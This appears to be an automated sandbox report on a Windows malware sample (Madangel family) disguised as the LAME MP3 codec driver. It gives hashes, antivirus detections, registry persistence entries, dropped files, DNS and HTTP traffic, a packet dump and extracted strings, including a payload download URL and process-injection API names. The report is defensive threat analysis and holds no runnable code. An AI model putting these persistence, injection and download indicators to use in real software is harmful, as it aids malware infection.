Analysis Date2014-11-01 02:00:55
MD55775040a86a4cad922a2a02a442b9412
SHA17ae8e8330cc5865e88122edfb627006f530f9de7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2bb3642b0199694864fb9b2835fa7085 sha1: ccfc9da08f31439601291b732ce04e994d55a193 size: 2048
Section.rdata md5: f70414bb795b058b318c69ecbba0942c sha1: 88d68cf8285b34e374dc911788e110b6a50e192f size: 512
Section.data md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: f09a9b20bb02ae370785d87955c3ef10 sha1: 19f7e073e5409459478ffce41c0b750cd0d3cf12 size: 44746
Timestamp2006-08-04 06:52:40
VersionLegalCopyright: Copyright © 2002 Steve Lhomme, Copyright © 2002-2007 The LAME Project
InternalName: lameACM
FileVersion: 0.9.2
CompanyName: http://www.mp3dev.org/
PrivateBuild:
LegalTrademarks: LGPL (see gnu.org)
Comments: This is an ACM driver for Win32 using Lame to encode
ProductName: Lame MP3 codec
SpecialBuild:
ProductVersion: 0.9.2
FileDescription: Lame MP3 codec engine
OriginalFilename: lameACM.acm
PEhashe965872aa6d32fb453b4617cd4fa9ab4907b4329
IMPhashc980cb7ca293a9371e8482e358604b02
AV360 SafeVirus.Win32.Madang.C
AVAd-AwareWin32.Madangel.I
AVAlwil (avast)Madangel:Win32:Madangel
AVArcabit (arcavir)W32.ChineHacker.B
AVAuthentiumW32/Downloader.BL.gen!Eldorado
AVAvira (antivir)W32/Small.l
AVBullGuardWin32.Madangel.I
AVCA (E-Trust Ino)Win32/Madangel
AVCAT (quickheal)W32.Madang.A
AVClamAVW32.Madangel
AVDr. WebBackDoor.Bulknet.1150
AVEmsisoftWin32.Madangel.I
AVEset (nod32)Win32/Madang.B virus
AVFortinetW32/Madang.C!tr
AVFrisk (f-prot)W32/Downloader.BL.gen!Eldorado
AVF-SecureWin32.Madangel.I
AVGrisoft (avg)Win32/Madang.C
AVIkarusVirus.Win32.Small
AVK7Virus ( 00001b721 )
AVKasperskyVirus.Win32.Small.l
AVMalwareBytesTrojan.Agent.BFG
AVMcafeeW32/Alisa.d
AVMicrosoft Security EssentialsVirus:Win32/Madang.A
AVMicroWorld (escan)Win32.Madangel.I
AVNormanWin32.Madangel.I
AVRisingWin32.AngryAngel.f
AVSophosW32/Madang-Fam
AVSymantecW32.Madangel
AVTrend MicroPE_MADANGEL.D
AVVirusBlokAda (vba32)Virus.Win32.Small.L

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Serverx ➝
C:\WINDOWS\system32\Serverx.exe\\x00^\\xb9\\x10w\\x10\\xec\\xddw\\x93\\xdd@\\x00\\x90\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x1c\\xfe\\x12\\x00\\xa7Tne\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa7Tne\\xde\\x07\\x0b\\x00\\x06\\x00\\x01\\x00\\x07\\x001\\x003\\x00\\x0f\\x00\\x9c\\xfd\\x12\\x00\\x07\\x001\\x00x\\xfe\\x12\\x00\\x04\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\x93\\xdd@\\x00\\x04\\x00\\x00\\x00\\xe3-le,Une\\xa7Tne\\x8aVne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90Tne\\x90\\x00\\x00\\x00\\xf5Tne\\x93\\xdd@\\x00\\x0fUne\\x04\\x00\\x00\\x00%Une\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xa6\\xdd@\\x000\\xae\\x80|\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xfe\\x12\\x00x\\xff\\x12\\x00\\x88Ome\\x90\\x00\\x00\\x00\\x84\\xfe\\x12\\x00x\\xff\\x12\\x00\\x01\\x00\\x00\\x00\\x1c]me\\x90\\x00\\x00\\x00\\x93\\xdd@\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xa6\\xdd@\\x00\\x00\\x00\\x00\\x00
Creates FileC:\WINDOWS\system32\Serverx.exe
Creates ProcessC:\malware.exe
Creates MutexAngry Angel v3.0

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\qyprusotemus ➝
C:\Documents and Settings\Administrator\qyprusotemus.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\AppManagement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\qyprusotemus.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexAngry Angel v3.0
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutexqyprusotemus
Winsock DNSdoctsf.com
Winsock DNSautoma.it
Winsock DNSacsmedioambiente.com
Winsock DNStss.org
Winsock DNSfraser-high.school.nz
Winsock DNSwww.traderush.com

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\setupx.dll
Winsock DNS192.168.6.161
Winsock URLhttp://192.168.6.161/setupx.dat

Process
↳ C:\setupx.dll

Network Details:

DNSsmtp.glbdns2.microsoft.com
Type: A
65.55.176.126
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
98.139.211.125
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
63.250.193.228
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
98.138.105.21
DNSsmtp.live.com
Type: A
DNSsmtp.mail.yahoo.com
Type: A
HTTP GEThttp://192.168.6.161/setupx.dat
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP192.168.1.1:1032 ➝ 98.139.211.125:25
Flows TCP192.168.1.1:1034 ➝ 192.168.1.1:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 7570782e 64617420   GET /setupx.dat 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a203139 322e3136 382e362e   Host: 192.168.6.
0x000000b0 (00176)   3136310d 0a436f6e 6e656374 696f6e3a   161..Connection:
0x000000c0 (00192)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
/
q^

040904b0
0.9.2
 2002-2007 The LAME Project
 2002 Steve Lhomme, Copyright 
6dB &hard limiter
Albu&m
&Album mode
&Artist
Average BitRate
Bits
Cancel
Checksum
Close
&Comment
Comments
CompanyName
Copyright
Copyright 
&Date
Decoding
default
&Dither 24bps to 16bps
E&nable dithering
&Enable ReplayGain
Encoding
FileDescription
FileVersion
FLAC Configuration
 FLAC Info  
&Genre
Gt'+
help
http://www.mp3dev.org/
icon : Lucas Granito
InternalName
lameACM
lameACM.acm
Lame MP3 codec
Lame MP3 codec : About
Lame MP3 codec engine
LegalCopyright
LegalTrademarks
LGPL license
LGPL (see gnu.org)
 Miscellaneous  
msctls_trackbar32
MS Sans Serif
Noise &shaping
Note: changes take effect after restarting playback
Original
OriginalFilename
&Output bit depth
&Preamp
Private
PrivateBuild
ProductName
ProductVersion
Read ID3v&1 tags
&Remove
 ReplayGain  
Reserve space for &FLAC tags
Reset
 Resolution  
Separate tag values &with
&Show instantaneous bitrate while playing
Slider1
Slider2
Slider3
Slider4
Smart Encode
SpecialBuild
Static
Step
Stereo mode
Steve Lhomme + LAME developers
Stop on &all errors
StringFileInfo
SysTabControl32
Tab1
 Tag  
 Tag Editor  
test
TEXTINCLUDE
This is an ACM driver for Win32 using Lame to encode
&Title
 Title Formatting  
Track &number
Translation
&Update
v0.0.0 - 0.00
VarFileInfo
VS_VERSION_INFO
 Without ReplayGain 
 With ReplayGain 
	_36r/
4zYw@}p:
5EShy*
?_#5v`N
8Ga jO
,"^}9N
ADVAPI32.DLL
Angry Angel v3.0
A}qT'b
AutoShareServer
AutoShareWks
axHG$#
b#WuW8z
-:C7Xc&
CloseHandle
closesocket
connect
C$>';r
CreateKernelThread
CreateMutexA
CreateRemoteThread
CreateThread
C:\setupx.dll
@.data
DeleteFileA
 DEv.Q
DllHasRun
-,e;:r7m
ewRqIA
=.exet
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
gdi32.dll
GetCommandLineA
GetComputerNameA
GetCurrentProcessId
GetDriveTypeA
GetFullPathNameA
gethostbyname
GetLastError
GetModuleHandleA
GetObjectA
GetProcAddress
GetSystemDirectoryA
GetSystemTime
GetWindow
GetWindowThreadProcessId
http://vguarder.91i.net/SETUPX.EXE
&<+}i 
.idata
#include "afxres.h"
kernel32.dll
KERNEL32.dll
K#xY\h
_lclose
_lcreat
<ll%IE
_llseek
LoadImageA
LoadLibraryA
LoadLibraryExA
_lopen
_lread
lut~ar
_lwrite
lxsN>#g
"_M2/{D
MessageBoxA
\M=LIq
MPR.DLL
nf'`Ey(
OpenMutexA
OpenProcess
Ot2(r~
p'%	>R
QS9012NMN-789733-908
`.rdata
RegisterServiceProcess
RegNotifyChangeKeyValue
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
.reloc
resource.h
rwZ	.5
=.scrt
SendMessageA
Serverx
\Serverx.exe
SetCurrentDirectoryA
SetFileAttributesA
SetFileTime
\setupx.exe
SHELL32.DLL
ShellExecuteA
ShowCursor
socket
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
s&XF"mB$
SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
TerminateThread
!This program cannot be run in DOS mode.
This program must be run under Win32
\updatex.exe
URLDownloadToFileA
URLMON.DLL
user32.dll
USER32.DLL
V4Xf=`
.VCsm&
VirtualAllocEx
WaitForSingleObject
WideCharToMultiByte
=windtz
WinExec
    =winn
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
~}wO&E%^
<$w,R]
WriteProcessMemory
WSACleanup
WSAStartup
WSOCK32.DLL
wsprintfA
XBU@6Z
*$y,AT
YC8~:C
yuG.GM{